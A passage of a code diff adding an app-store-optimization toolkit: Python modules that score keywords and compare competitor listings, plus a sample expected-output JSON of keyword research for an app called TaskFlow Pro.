|
||||||
|
for analysis in analyses:
|
||||||
|
app_name = analysis['app_name']
|
||||||
|
keywords = analysis['keyword_strategy']['primary_keywords']
|
||||||
|
all_keywords_by_app[app_name] = set(keywords)
|
||||||
|
|
||||||
|
# Find keywords used by some but not all
|
||||||
|
all_keywords_set = set()
|
||||||
|
for keywords in all_keywords_by_app.values():
|
||||||
|
all_keywords_set.update(keywords)
|
||||||
|
|
||||||
|
gaps = []
|
||||||
|
for keyword in all_keywords_set:
|
||||||
|
using_apps = [
|
||||||
|
app for app, keywords in all_keywords_by_app.items()
|
||||||
|
if keyword in keywords
|
||||||
|
]
|
||||||
|
if 1 < len(using_apps) < len(analyses):
|
||||||
|
gaps.append({
|
||||||
|
'keyword': keyword,
|
||||||
|
'used_by': using_apps,
|
||||||
|
'usage_percentage': round(len(using_apps) / len(analyses) * 100, 1)
|
||||||
|
})
|
||||||
|
|
||||||
|
return sorted(gaps, key=lambda x: x['usage_percentage'], reverse=True)[:15]
|
||||||
|
|
||||||
|
def _analyze_rating_distribution(self, analyses: List[Dict[str, Any]]) -> Dict[str, Any]:
|
||||||
|
"""Analyze rating distribution across competitors."""
|
||||||
|
ratings = [a['rating_metrics']['rating'] for a in analyses]
|
||||||
|
ratings_counts = [a['rating_metrics']['ratings_count'] for a in analyses]
|
||||||
|
|
||||||
|
return {
|
||||||
|
'average_rating': round(sum(ratings) / len(ratings), 2),
|
||||||
|
'highest_rating': max(ratings),
|
||||||
|
'lowest_rating': min(ratings),
|
||||||
|
'average_ratings_count': int(sum(ratings_counts) / len(ratings_counts)),
|
||||||
|
'total_ratings_in_category': sum(ratings_counts)
|
||||||
|
}
|
||||||
|
|
||||||
|
def _identify_best_practices(self, ranked_competitors: List[Dict[str, Any]]) -> List[str]:
|
||||||
|
"""Identify best practices from top competitors."""
|
||||||
|
if not ranked_competitors:
|
||||||
|
return []
|
||||||
|
|
||||||
|
top_competitor = ranked_competitors[0]
|
||||||
|
practices = []
|
||||||
|
|
||||||
|
# Title strategy
|
||||||
|
title_analysis = top_competitor['title_analysis']
|
||||||
|
if title_analysis['has_keywords']:
|
||||||
|
practices.append(
|
||||||
|
f"Title Strategy: Include primary keyword in title (e.g., '{title_analysis['title']}')"
|
||||||
|
)
|
||||||
|
|
||||||
|
# Description structure
|
||||||
|
desc_analysis = top_competitor['description_analysis']
|
||||||
|
if desc_analysis['structure']['has_bullet_points']:
|
||||||
|
practices.append("Description: Use bullet points to highlight key features")
|
||||||
|
|
||||||
|
if desc_analysis['structure']['has_sections']:
|
||||||
|
practices.append("Description: Organize content with clear section headers")
|
||||||
|
|
||||||
|
# Rating strategy
|
||||||
|
rating_quality = top_competitor['rating_metrics']['rating_quality']
|
||||||
|
if rating_quality in ['excellent', 'good']:
|
||||||
|
practices.append(
|
||||||
|
f"Ratings: Maintain high rating quality ({top_competitor['rating_metrics']['rating']}★) "
|
||||||
|
f"with significant volume ({top_competitor['rating_metrics']['ratings_count']} ratings)"
|
||||||
|
)
|
||||||
|
|
||||||
|
return practices[:5]
|
||||||
|
|
||||||
|
def _identify_opportunities(
|
||||||
|
self,
|
||||||
|
analyses: List[Dict[str, Any]],
|
||||||
|
common_keywords: List[str],
|
||||||
|
keyword_gaps: List[Dict[str, Any]]
|
||||||
|
) -> List[str]:
|
||||||
|
"""Identify ASO opportunities based on competitive analysis."""
|
||||||
|
opportunities = []
|
||||||
|
|
||||||
|
# Keyword opportunities from gaps
|
||||||
|
if keyword_gaps:
|
||||||
|
underutilized_keywords = [
|
||||||
|
gap['keyword'] for gap in keyword_gaps
|
||||||
|
if gap['usage_percentage'] < 50
|
||||||
|
]
|
||||||
|
if underutilized_keywords:
|
||||||
|
opportunities.append(
|
||||||
|
f"Target underutilized keywords: {', '.join(underutilized_keywords[:5])}"
|
||||||
|
)
|
||||||
|
|
||||||
|
# Rating opportunity
|
||||||
|
avg_rating = sum(a['rating_metrics']['rating'] for a in analyses) / len(analyses)
|
||||||
|
if avg_rating < 4.5:
|
||||||
|
opportunities.append(
|
||||||
|
f"Category average rating is {avg_rating:.1f} - opportunity to differentiate with higher ratings"
|
||||||
|
)
|
||||||
|
|
||||||
|
# Content depth opportunity
|
||||||
|
avg_desc_length = sum(
|
||||||
|
a['description_analysis']['length'] for a in analyses
|
||||||
|
) / len(analyses)
|
||||||
|
if avg_desc_length < 1500:
|
||||||
|
opportunities.append(
|
||||||
|
"Competitors have relatively short descriptions - opportunity to provide more comprehensive information"
|
||||||
|
)
|
||||||
|
|
||||||
|
return opportunities[:5]
|
||||||
|
|
||||||
|
def _extract_features(self, description: str) -> List[str]:
|
||||||
|
"""Extract feature mentions from description."""
|
||||||
|
# Look for bullet points or numbered lists
|
||||||
|
lines = description.split('\n')
|
||||||
|
features = []
|
||||||
|
|
||||||
|
for line in lines:
|
||||||
|
line = line.strip()
|
||||||
|
# Check if line starts with bullet or number
|
||||||
|
if line and (line[0] in ['•', '*', '-', '✓'] or line[0].isdigit()):
|
||||||
|
# Clean the line
|
||||||
|
cleaned = re.sub(r'^[•*\-✓\d.)\s]+', '', line)
|
||||||
|
if cleaned:
|
||||||
|
features.append(cleaned)
|
||||||
|
|
||||||
|
return features[:10]
|
||||||
|
|
||||||
|
def _assess_keyword_focus(
|
||||||
|
self,
|
||||||
|
title_keywords: List[str],
|
||||||
|
description_keywords: List[str]
|
||||||
|
) -> str:
|
||||||
|
"""Assess keyword focus strategy."""
|
||||||
|
overlap = set(title_keywords) & set(description_keywords)
|
||||||
|
|
||||||
|
if len(overlap) >= 3:
|
||||||
|
return 'consistent_focus'
|
||||||
|
elif len(overlap) >= 1:
|
||||||
|
return 'moderate_focus'
|
||||||
|
else:
|
||||||
|
return 'broad_focus'
|
||||||
|
|
||||||
|
def _generate_keyword_recommendations(self, missing_keywords: set) -> List[str]:
|
||||||
|
"""Generate recommendations for missing keywords."""
|
||||||
|
if not missing_keywords:
|
||||||
|
return ["Your keyword coverage is comprehensive"]
|
||||||
|
|
||||||
|
recommendations = []
|
||||||
|
missing_list = list(missing_keywords)[:5]
|
||||||
|
|
||||||
|
recommendations.append(
|
||||||
|
f"Consider adding these competitor keywords: {', '.join(missing_list)}"
|
||||||
|
)
|
||||||
|
recommendations.append(
|
||||||
|
"Test keyword variations in subtitle/promotional text first"
|
||||||
|
)
|
||||||
|
recommendations.append(
|
||||||
|
"Monitor competitor keyword changes monthly"
|
||||||
|
)
|
||||||
|
|
||||||
|
return recommendations
|
||||||
|
|
||||||
|
def _generate_rating_improvement_actions(self, rating_gap: float) -> List[str]:
|
||||||
|
"""Generate actions to improve ratings."""
|
||||||
|
actions = []
|
||||||
|
|
||||||
|
if rating_gap > 0.5:
|
||||||
|
actions.append("CRITICAL: Significant rating gap - prioritize user satisfaction improvements")
|
||||||
|
actions.append("Analyze negative reviews to identify top issues")
|
||||||
|
actions.append("Implement in-app rating prompts after positive experiences")
|
||||||
|
actions.append("Respond to all negative reviews professionally")
|
||||||
|
elif rating_gap > 0.2:
|
||||||
|
actions.append("Focus on incremental improvements to close rating gap")
|
||||||
|
actions.append("Optimize timing of rating requests")
|
||||||
|
else:
|
||||||
|
actions.append("Ratings are competitive - maintain quality and continue improvements")
|
||||||
|
|
||||||
|
return actions
|
||||||
|
|
||||||
|
def _generate_content_recommendations(self, desc_length_gap: int) -> List[str]:
|
||||||
|
"""Generate content recommendations based on length gap."""
|
||||||
|
recommendations = []
|
||||||
|
|
||||||
|
if desc_length_gap > 500:
|
||||||
|
recommendations.append(
|
||||||
|
"Expand description to match competitor detail level"
|
||||||
|
)
|
||||||
|
recommendations.append(
|
||||||
|
"Add use case examples and success stories"
|
||||||
|
)
|
||||||
|
recommendations.append(
|
||||||
|
"Include more feature explanations and benefits"
|
||||||
|
)
|
||||||
|
elif desc_length_gap < -500:
|
||||||
|
recommendations.append(
|
||||||
|
"Consider condensing description for better readability"
|
||||||
|
)
|
||||||
|
recommendations.append(
|
||||||
|
"Focus on most important features first"
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
recommendations.append(
|
||||||
|
"Description length is competitive"
|
||||||
|
)
|
||||||
|
|
||||||
|
return recommendations
|
||||||
|
|
||||||
|
def _assess_competitive_position(
|
||||||
|
self,
|
||||||
|
your_analysis: Dict[str, Any],
|
||||||
|
competitor_comparison: Dict[str, Any]
|
||||||
|
) -> str:
|
||||||
|
"""Assess your competitive position."""
|
||||||
|
your_strength = your_analysis['competitive_strength']
|
||||||
|
competitors = competitor_comparison['ranked_competitors']
|
||||||
|
|
||||||
|
if not competitors:
|
||||||
|
return "No comparison data available"
|
||||||
|
|
||||||
|
# Find where you'd rank
|
||||||
|
better_than_count = sum(
|
||||||
|
1 for comp in competitors
|
||||||
|
if your_strength > comp['competitive_strength']
|
||||||
|
)
|
||||||
|
|
||||||
|
position_percentage = (better_than_count / len(competitors)) * 100
|
||||||
|
|
||||||
|
if position_percentage >= 75:
|
||||||
|
return "Strong Position: Top quartile in competitive strength"
|
||||||
|
elif position_percentage >= 50:
|
||||||
|
return "Competitive Position: Above average, opportunities for improvement"
|
||||||
|
elif position_percentage >= 25:
|
||||||
|
return "Challenging Position: Below average, requires strategic improvements"
|
||||||
|
else:
|
||||||
|
return "Weak Position: Bottom quartile, major ASO overhaul needed"
|
||||||
|
|
||||||
|
|
||||||
|
def analyze_competitor_set(
|
||||||
|
category: str,
|
||||||
|
competitors_data: List[Dict[str, Any]],
|
||||||
|
platform: str = 'apple'
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Convenience function to analyze a set of competitors.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
category: App category
|
||||||
|
competitors_data: List of competitor data
|
||||||
|
platform: 'apple' or 'google'
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Complete competitive analysis
|
||||||
|
"""
|
||||||
|
analyzer = CompetitorAnalyzer(category, platform)
|
||||||
|
return analyzer.compare_competitors(competitors_data)
|
||||||
170
skills/app-store-optimization/expected_output.json
Normal file
170
skills/app-store-optimization/expected_output.json
Normal file
@@ -0,0 +1,170 @@
|
|||||||
|
{
|
||||||
|
"request_type": "keyword_research",
|
||||||
|
"app_name": "TaskFlow Pro",
|
||||||
|
"keyword_analysis": {
|
||||||
|
"total_keywords_analyzed": 25,
|
||||||
|
"primary_keywords": [
|
||||||
|
{
|
||||||
|
"keyword": "task manager",
|
||||||
|
"search_volume": 45000,
|
||||||
|
"competition_level": "high",
|
||||||
|
"relevance_score": 0.95,
|
||||||
|
"difficulty_score": 72.5,
|
||||||
|
"potential_score": 78.3,
|
||||||
|
"recommendation": "High priority - target immediately"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"keyword": "productivity app",
|
||||||
|
"search_volume": 38000,
|
||||||
|
"competition_level": "high",
|
||||||
|
"relevance_score": 0.90,
|
||||||
|
"difficulty_score": 68.2,
|
||||||
|
"potential_score": 75.1,
|
||||||
|
"recommendation": "High priority - target immediately"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"keyword": "todo list",
|
||||||
|
"search_volume": 52000,
|
||||||
|
"competition_level": "very_high",
|
||||||
|
"relevance_score": 0.85,
|
||||||
|
"difficulty_score": 78.9,
|
||||||
|
"potential_score": 71.4,
|
||||||
|
"recommendation": "High priority - target immediately"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"secondary_keywords": [
|
||||||
|
{
|
||||||
|
"keyword": "team task manager",
|
||||||
|
"search_volume": 8500,
|
||||||
|
"competition_level": "medium",
|
||||||
|
"relevance_score": 0.88,
|
||||||
|
"difficulty_score": 42.3,
|
||||||
|
"potential_score": 68.7,
|
||||||
|
"recommendation": "Good opportunity - include in metadata"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"keyword": "project planning app",
|
||||||
|
"search_volume": 12000,
|
||||||
|
"competition_level": "medium",
|
||||||
|
"relevance_score": 0.75,
|
||||||
|
"difficulty_score": 48.1,
|
||||||
|
"potential_score": 64.2,
|
||||||
|
"recommendation": "Good opportunity - include in metadata"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"long_tail_keywords": [
|
||||||
|
{
|
||||||
|
"keyword": "ai task prioritization",
|
||||||
|
"search_volume": 2800,
|
||||||
|
"competition_level": "low",
|
||||||
|
"relevance_score": 0.95,
|
||||||
|
"difficulty_score": 25.4,
|
||||||
|
"potential_score": 82.6,
|
||||||
|
"recommendation": "Excellent long-tail opportunity"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"keyword": "team productivity tool",
|
||||||
|
"search_volume": 3500,
|
||||||
|
"competition_level": "low",
|
||||||
|
"relevance_score": 0.85,
|
||||||
|
"difficulty_score": 28.7,
|
||||||
|
"potential_score": 79.3,
|
||||||
|
"recommendation": "Excellent long-tail opportunity"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
"competitor_insights": {
|
||||||
|
"competitors_analyzed": 4,
|
||||||
|
"common_keywords": [
|
||||||
|
"task",
|
||||||
|
"todo",
|
||||||
|
"list",
|
||||||
|
"productivity",
|
||||||
|
"organize",
|
||||||
|
"manage"
|
||||||
|
],
|
||||||
|
"keyword_gaps": [
|
||||||
|
{
|
||||||
|
"keyword": "ai prioritization",
|
||||||
|
"used_by": ["None of the major competitors"],
|
||||||
|
"opportunity": "Unique positioning opportunity"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"keyword": "smart task manager",
|
||||||
|
"used_by": ["Things 3"],
|
||||||
|
"opportunity": "Underutilized by most competitors"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
"metadata_recommendations": {
|
||||||
|
"apple_app_store": {
|
||||||
|
"title_options": [
|
||||||
|
{
|
||||||
|
"title": "TaskFlow - AI Task Manager",
|
||||||
|
"length": 26,
|
||||||
|
"keywords_included": ["task manager", "ai"],
|
||||||
|
"strategy": "brand_plus_primary"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"title": "TaskFlow: Smart Todo & Tasks",
|
||||||
|
"length": 29,
|
||||||
|
"keywords_included": ["todo", "tasks"],
|
||||||
|
"strategy": "brand_plus_multiple"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"subtitle_recommendation": "AI-Powered Team Productivity",
|
||||||
|
"keyword_field": "productivity,organize,planner,schedule,workflow,reminders,collaboration,calendar,sync,priorities",
|
||||||
|
"description_focus": "Lead with AI differentiation, emphasize team features"
|
||||||
|
},
|
||||||
|
"google_play_store": {
|
||||||
|
"title_options": [
|
||||||
|
{
|
||||||
|
"title": "TaskFlow - AI Task Manager & Team Productivity",
|
||||||
|
"length": 48,
|
||||||
|
"keywords_included": ["task manager", "ai", "team", "productivity"],
|
||||||
|
"strategy": "keyword_rich"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"short_description_recommendation": "AI task manager - Organize, prioritize, and collaborate with your team",
|
||||||
|
"description_focus": "Keywords naturally integrated throughout 4000 character description"
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"strategic_recommendations": [
|
||||||
|
"Focus on 'AI prioritization' as unique differentiator - low competition, high relevance",
|
||||||
|
"Target 'team task manager' and 'team productivity' keywords - good search volume, lower competition than generic terms",
|
||||||
|
"Include long-tail keywords in description for additional discovery opportunities",
|
||||||
|
"Test title variations with A/B testing after launch",
|
||||||
|
"Monitor competitor keyword changes quarterly"
|
||||||
|
],
|
||||||
|
"priority_actions": [
|
||||||
|
{
|
||||||
|
"action": "Optimize app title with primary keyword",
|
||||||
|
"priority": "high",
|
||||||
|
"expected_impact": "15-25% improvement in search visibility"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"action": "Create description highlighting AI features with natural keyword integration",
|
||||||
|
"priority": "high",
|
||||||
|
"expected_impact": "10-15% improvement in conversion rate"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"action": "Plan A/B tests for icon and screenshots post-launch",
|
||||||
|
"priority": "medium",
|
||||||
|
"expected_impact": "5-10% improvement in conversion rate"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"aso_health_estimate": {
|
||||||
|
"current_score": "N/A (pre-launch)",
|
||||||
|
"potential_score_with_optimizations": "75-80/100",
|
||||||
|
"key_strengths": [
|
||||||
|
"Unique AI differentiation",
|
||||||
|
"Clear target audience",
|
||||||
|
"Strong feature set"
|
||||||
|
],
|
||||||
|
"areas_to_develop": [
|
||||||
|
"Build rating volume post-launch",
|
||||||
|
"Monitor and respond to reviews",
|
||||||
|
"Continuous keyword optimization"
|
||||||
|
]
|
||||||
|
}
|
||||||
|
}
|
||||||
406
skills/app-store-optimization/keyword_analyzer.py
Normal file
406
skills/app-store-optimization/keyword_analyzer.py
Normal file
@@ -0,0 +1,406 @@
|
|||||||
|
"""
|
||||||
|
Keyword analysis module for App Store Optimization.
|
||||||
|
Analyzes keyword search volume, competition, and relevance for app discovery.
|
||||||
|
"""
|
||||||
|
|
||||||
|
from typing import Dict, List, Any, Optional, Tuple
|
||||||
|
import re
|
||||||
|
from collections import Counter
|
||||||
|
|
||||||
|
|
||||||
|
class KeywordAnalyzer:
|
||||||
|
"""Analyzes keywords for ASO effectiveness."""
|
||||||
|
|
||||||
|
# Competition level thresholds (based on number of competing apps)
|
||||||
|
COMPETITION_THRESHOLDS = {
|
||||||
|
'low': 1000,
|
||||||
|
'medium': 5000,
|
||||||
|
'high': 10000
|
||||||
|
}
|
||||||
|
|
||||||
|
# Search volume categories (monthly searches estimate)
|
||||||
|
VOLUME_CATEGORIES = {
|
||||||
|
'very_low': 1000,
|
||||||
|
'low': 5000,
|
||||||
|
'medium': 20000,
|
||||||
|
'high': 100000,
|
||||||
|
'very_high': 500000
|
||||||
|
}
|
||||||
|
|
||||||
|
def __init__(self):
|
||||||
|
"""Initialize keyword analyzer."""
|
||||||
|
self.analyzed_keywords = {}
|
||||||
|
|
||||||
|
def analyze_keyword(
|
||||||
|
self,
|
||||||
|
keyword: str,
|
||||||
|
search_volume: int = 0,
|
||||||
|
competing_apps: int = 0,
|
||||||
|
relevance_score: float = 0.0
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Analyze a single keyword for ASO potential.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
keyword: The keyword to analyze
|
||||||
|
search_volume: Estimated monthly search volume
|
||||||
|
competing_apps: Number of apps competing for this keyword
|
||||||
|
relevance_score: Relevance to your app (0.0-1.0)
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Dictionary with keyword analysis
|
||||||
|
"""
|
||||||
|
competition_level = self._calculate_competition_level(competing_apps)
|
||||||
|
volume_category = self._categorize_search_volume(search_volume)
|
||||||
|
difficulty_score = self._calculate_keyword_difficulty(
|
||||||
|
search_volume,
|
||||||
|
competing_apps
|
||||||
|
)
|
||||||
|
|
||||||
|
# Calculate potential score (0-100)
|
||||||
|
potential_score = self._calculate_potential_score(
|
||||||
|
search_volume,
|
||||||
|
competing_apps,
|
||||||
|
relevance_score
|
||||||
|
)
|
||||||
|
|
||||||
|
analysis = {
|
||||||
|
'keyword': keyword,
|
||||||
|
'search_volume': search_volume,
|
||||||
|
'volume_category': volume_category,
|
||||||
|
'competing_apps': competing_apps,
|
||||||
|
'competition_level': competition_level,
|
||||||
|
'relevance_score': relevance_score,
|
||||||
|
'difficulty_score': difficulty_score,
|
||||||
|
'potential_score': potential_score,
|
||||||
|
'recommendation': self._generate_recommendation(
|
||||||
|
potential_score,
|
||||||
|
difficulty_score,
|
||||||
|
relevance_score
|
||||||
|
),
|
||||||
|
'keyword_length': len(keyword.split()),
|
||||||
|
'is_long_tail': len(keyword.split()) >= 3
|
||||||
|
}
|
||||||
|
|
||||||
|
self.analyzed_keywords[keyword] = analysis
|
||||||
|
return analysis
|
||||||
|
|
||||||
|
def compare_keywords(self, keywords_data: List[Dict[str, Any]]) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Compare multiple keywords and rank by potential.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
keywords_data: List of dicts with keyword, search_volume, competing_apps, relevance_score
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Comparison report with ranked keywords
|
||||||
|
"""
|
||||||
|
analyses = []
|
||||||
|
for kw_data in keywords_data:
|
||||||
|
analysis = self.analyze_keyword(
|
||||||
|
keyword=kw_data['keyword'],
|
||||||
|
search_volume=kw_data.get('search_volume', 0),
|
||||||
|
competing_apps=kw_data.get('competing_apps', 0),
|
||||||
|
relevance_score=kw_data.get('relevance_score', 0.0)
|
||||||
|
)
|
||||||
|
analyses.append(analysis)
|
||||||
|
|
||||||
|
# Sort by potential score (descending)
|
||||||
|
ranked_keywords = sorted(
|
||||||
|
analyses,
|
||||||
|
key=lambda x: x['potential_score'],
|
||||||
|
reverse=True
|
||||||
|
)
|
||||||
|
|
||||||
|
# Categorize keywords
|
||||||
|
primary_keywords = [
|
||||||
|
kw for kw in ranked_keywords
|
||||||
|
if kw['potential_score'] >= 70 and kw['relevance_score'] >= 0.8
|
||||||
|
]
|
||||||
|
|
||||||
|
secondary_keywords = [
|
||||||
|
kw for kw in ranked_keywords
|
||||||
|
if 50 <= kw['potential_score'] < 70 and kw['relevance_score'] >= 0.6
|
||||||
|
]
|
||||||
|
|
||||||
|
long_tail_keywords = [
|
||||||
|
kw for kw in ranked_keywords
|
||||||
|
if kw['is_long_tail'] and kw['relevance_score'] >= 0.7
|
||||||
|
]
|
||||||
|
|
||||||
|
return {
|
||||||
|
'total_keywords_analyzed': len(analyses),
|
||||||
|
'ranked_keywords': ranked_keywords,
|
||||||
|
'primary_keywords': primary_keywords[:5], # Top 5
|
||||||
|
'secondary_keywords': secondary_keywords[:10], # Top 10
|
||||||
|
'long_tail_keywords': long_tail_keywords[:10], # Top 10
|
||||||
|
'summary': self._generate_comparison_summary(
|
||||||
|
primary_keywords,
|
||||||
|
secondary_keywords,
|
||||||
|
long_tail_keywords
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
def find_long_tail_opportunities(
|
||||||
|
self,
|
||||||
|
base_keyword: str,
|
||||||
|
modifiers: List[str]
|
||||||
|
) -> List[Dict[str, Any]]:
|
||||||
|
"""
|
||||||
|
Generate long-tail keyword variations.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
base_keyword: Core keyword (e.g., "task manager")
|
||||||
|
modifiers: List of modifiers (e.g., ["free", "simple", "team"])
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
List of long-tail keyword suggestions
|
||||||
|
"""
|
||||||
|
long_tail_keywords = []
|
||||||
|
|
||||||
|
# Generate combinations
|
||||||
|
for modifier in modifiers:
|
||||||
|
# Modifier + base
|
||||||
|
variation1 = f"{modifier} {base_keyword}"
|
||||||
|
long_tail_keywords.append({
|
||||||
|
'keyword': variation1,
|
||||||
|
'pattern': 'modifier_base',
|
||||||
|
'estimated_competition': 'low',
|
||||||
|
'rationale': f"Less competitive variation of '{base_keyword}'"
|
||||||
|
})
|
||||||
|
|
||||||
|
# Base + modifier
|
||||||
|
variation2 = f"{base_keyword} {modifier}"
|
||||||
|
long_tail_keywords.append({
|
||||||
|
'keyword': variation2,
|
||||||
|
'pattern': 'base_modifier',
|
||||||
|
'estimated_competition': 'low',
|
||||||
|
'rationale': f"Specific use-case variation of '{base_keyword}'"
|
||||||
|
})
|
||||||
|
|
||||||
|
# Add question-based long-tail
|
||||||
|
question_words = ['how', 'what', 'best', 'top']
|
||||||
|
for q_word in question_words:
|
||||||
|
question_keyword = f"{q_word} {base_keyword}"
|
||||||
|
long_tail_keywords.append({
|
||||||
|
'keyword': question_keyword,
|
||||||
|
'pattern': 'question_based',
|
||||||
|
'estimated_competition': 'very_low',
|
||||||
|
'rationale': f"Informational search query"
|
||||||
|
})
|
||||||
|
|
||||||
|
return long_tail_keywords
|
||||||
|
|
||||||
|
def extract_keywords_from_text(
|
||||||
|
self,
|
||||||
|
text: str,
|
||||||
|
min_word_length: int = 3
|
||||||
|
) -> List[Tuple[str, int]]:
|
||||||
|
"""
|
||||||
|
Extract potential keywords from text (descriptions, reviews).
|
||||||
|
|
||||||
|
Args:
|
||||||
|
text: Text to analyze
|
||||||
|
min_word_length: Minimum word length to consider
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
List of (keyword, frequency) tuples
|
||||||
|
"""
|
||||||
|
# Clean and normalize text
|
||||||
|
text = text.lower()
|
||||||
|
text = re.sub(r'[^\w\s]', ' ', text)
|
||||||
|
|
||||||
|
# Extract words
|
||||||
|
words = text.split()
|
||||||
|
|
||||||
|
# Filter by length
|
||||||
|
words = [w for w in words if len(w) >= min_word_length]
|
||||||
|
|
||||||
|
# Remove common stop words
|
||||||
|
stop_words = {
|
||||||
|
'the', 'and', 'for', 'with', 'this', 'that', 'from', 'have',
|
||||||
|
'but', 'not', 'you', 'all', 'can', 'are', 'was', 'were', 'been'
|
||||||
|
}
|
||||||
|
words = [w for w in words if w not in stop_words]
|
||||||
|
|
||||||
|
# Count frequency
|
||||||
|
word_counts = Counter(words)
|
||||||
|
|
||||||
|
# Extract 2-word phrases
|
||||||
|
phrases = []
|
||||||
|
for i in range(len(words) - 1):
|
||||||
|
phrase = f"{words[i]} {words[i+1]}"
|
||||||
|
phrases.append(phrase)
|
||||||
|
|
||||||
|
phrase_counts = Counter(phrases)
|
||||||
|
|
||||||
|
# Combine and sort
|
||||||
|
all_keywords = list(word_counts.items()) + list(phrase_counts.items())
|
||||||
|
all_keywords.sort(key=lambda x: x[1], reverse=True)
|
||||||
|
|
||||||
|
return all_keywords[:50] # Top 50
|
||||||
|
|
||||||
|
def calculate_keyword_density(
|
||||||
|
self,
|
||||||
|
text: str,
|
||||||
|
target_keywords: List[str]
|
||||||
|
) -> Dict[str, float]:
|
||||||
|
"""
|
||||||
|
Calculate keyword density in text.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
text: Text to analyze (title, description)
|
||||||
|
target_keywords: Keywords to check density for
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Dictionary of keyword: density (percentage)
|
||||||
|
"""
|
||||||
|
text_lower = text.lower()
|
||||||
|
total_words = len(text_lower.split())
|
||||||
|
|
||||||
|
densities = {}
|
||||||
|
for keyword in target_keywords:
|
||||||
|
keyword_lower = keyword.lower()
|
||||||
|
occurrences = text_lower.count(keyword_lower)
|
||||||
|
density = (occurrences / total_words) * 100 if total_words > 0 else 0
|
||||||
|
densities[keyword] = round(density, 2)
|
||||||
|
|
||||||
|
return densities
|
||||||
|
|
||||||
|
def _calculate_competition_level(self, competing_apps: int) -> str:
|
||||||
|
"""Determine competition level based on number of competing apps."""
|
||||||
|
if competing_apps < self.COMPETITION_THRESHOLDS['low']:
|
||||||
|
return 'low'
|
||||||
|
elif competing_apps < self.COMPETITION_THRESHOLDS['medium']:
|
||||||
|
return 'medium'
|
||||||
|
elif competing_apps < self.COMPETITION_THRESHOLDS['high']:
|
||||||
|
return 'high'
|
||||||
|
else:
|
||||||
|
return 'very_high'
|
||||||
|
|
||||||
|
def _categorize_search_volume(self, search_volume: int) -> str:
|
||||||
|
"""Categorize search volume."""
|
||||||
|
if search_volume < self.VOLUME_CATEGORIES['very_low']:
|
||||||
|
return 'very_low'
|
||||||
|
elif search_volume < self.VOLUME_CATEGORIES['low']:
|
||||||
|
return 'low'
|
||||||
|
elif search_volume < self.VOLUME_CATEGORIES['medium']:
|
||||||
|
return 'medium'
|
||||||
|
elif search_volume < self.VOLUME_CATEGORIES['high']:
|
||||||
|
return 'high'
|
||||||
|
else:
|
||||||
|
return 'very_high'
|
||||||
|
|
||||||
|
def _calculate_keyword_difficulty(
|
||||||
|
self,
|
||||||
|
search_volume: int,
|
||||||
|
competing_apps: int
|
||||||
|
) -> float:
|
||||||
|
"""
|
||||||
|
Calculate keyword difficulty score (0-100).
|
||||||
|
Higher score = harder to rank.
|
||||||
|
"""
|
||||||
|
if competing_apps == 0:
|
||||||
|
return 0.0
|
||||||
|
|
||||||
|
# Competition factor (0-1)
|
||||||
|
competition_factor = min(competing_apps / 50000, 1.0)
|
||||||
|
|
||||||
|
# Volume factor (0-1) - higher volume = more difficulty
|
||||||
|
volume_factor = min(search_volume / 1000000, 1.0)
|
||||||
|
|
||||||
|
# Difficulty score (weighted average)
|
||||||
|
difficulty = (competition_factor * 0.7 + volume_factor * 0.3) * 100
|
||||||
|
|
||||||
|
return round(difficulty, 1)
|
||||||
|
|
||||||
|
def _calculate_potential_score(
|
||||||
|
self,
|
||||||
|
search_volume: int,
|
||||||
|
competing_apps: int,
|
||||||
|
relevance_score: float
|
||||||
|
) -> float:
|
||||||
|
"""
|
||||||
|
Calculate overall keyword potential (0-100).
|
||||||
|
Higher score = better opportunity.
|
||||||
|
"""
|
||||||
|
# Volume score (0-40 points)
|
||||||
|
volume_score = min((search_volume / 100000) * 40, 40)
|
||||||
|
|
||||||
|
# Competition score (0-30 points) - inverse relationship
|
||||||
|
if competing_apps > 0:
|
||||||
|
competition_score = max(30 - (competing_apps / 500), 0)
|
||||||
|
else:
|
||||||
|
competition_score = 30
|
||||||
|
|
||||||
|
# Relevance score (0-30 points)
|
||||||
|
relevance_points = relevance_score * 30
|
||||||
|
|
||||||
|
total_score = volume_score + competition_score + relevance_points
|
||||||
|
|
||||||
|
return round(min(total_score, 100), 1)
|
||||||
|
|
||||||
|
def _generate_recommendation(
|
||||||
|
self,
|
||||||
|
potential_score: float,
|
||||||
|
difficulty_score: float,
|
||||||
|
relevance_score: float
|
||||||
|
) -> str:
|
||||||
|
"""Generate actionable recommendation for keyword."""
|
||||||
|
if relevance_score < 0.5:
|
||||||
|
return "Low relevance - avoid targeting"
|
||||||
|
|
||||||
|
if potential_score >= 70:
|
||||||
|
return "High priority - target immediately"
|
||||||
|
elif potential_score >= 50:
|
||||||
|
if difficulty_score < 50:
|
||||||
|
return "Good opportunity - include in metadata"
